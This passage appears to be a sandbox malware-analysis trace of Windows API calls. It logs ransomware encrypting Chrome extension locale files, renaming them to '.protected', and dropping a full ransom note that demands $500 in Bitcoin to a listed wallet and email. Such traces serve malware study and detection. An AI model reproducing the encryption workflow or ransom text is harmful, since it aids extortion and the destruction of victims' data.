Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.protected") returned 167 [0079.793] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.protected")) returned 1 [0079.793] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.793] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.793] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\RESTORE_FILES.txt") returned 161 [0079.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.793] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.793] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.794] lstrlenA (lpString="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") returned 684 [0079.794] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.794] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.794] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.794] CloseHandle (hObject=0x164) returned 1 [0079.794] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.794] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0079.794] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0079.794] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0079.794] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0079.794] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0079.794] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko") returned 143 [0079.794] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0079.794] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0079.795] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\*") returned 145 [0079.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.799] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.799] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.799] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.799] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.799] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.799] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\.") returned 145 [0079.799] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.799] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.799] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.799] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.799] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.799] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.799] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.799] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\..") returned 146 [0079.799] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.799] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.799] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.799] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.799] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.799] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.799] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.799] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.799] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json") returned 157 [0079.799] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.799] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.799] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.799] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.800] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json") returned 157 [0079.800] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.800] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json") returned 157 [0079.800] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.800] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json") returned 157 [0079.800] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.800] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.800] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.800] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.801] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.801] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.801] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.801] CloseHandle (hObject=0x168) returned 1 [0079.801] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.protected") returned 167 [0079.801] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.protected")) returned 1 [0079.801] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.802] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.802] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\RESTORE_FILES.txt") returned 161 [0079.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.803] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.803] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.804] lstrlenA (lpString="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") returned 684 [0079.804] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.804] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.804] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.804] CloseHandle (hObject=0x164) returned 1 [0079.804] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.804] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0079.804] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0079.804] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0079.804] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0079.804] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0079.804] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt") returned 143 [0079.804] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0079.804] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0079.804] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\*") returned 145 [0079.804] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.805] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.805] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.805] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.805] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.805] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.805] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\.") returned 145 [0079.805] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.805] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.805] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.805] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.805] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.805] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.805] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.805] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\..") returned 146 [0079.805] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.805] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.805] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.805] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.805] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.805] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.805] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.805] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.805] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json") returned 157 [0079.805] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.805] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.805] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.805] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json") returned 157 [0079.806] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json") returned 157 [0079.806] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json") returned 157 [0079.806] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.806] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.806] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.806] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.807] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.807] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.807] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.807] CloseHandle (hObject=0x168) returned 1 [0079.807] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.protected") returned 167 [0079.807] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.protected")) returned 1 [0079.807] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.807] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.807] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\RESTORE_FILES.txt") returned 161 [0079.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.808] 
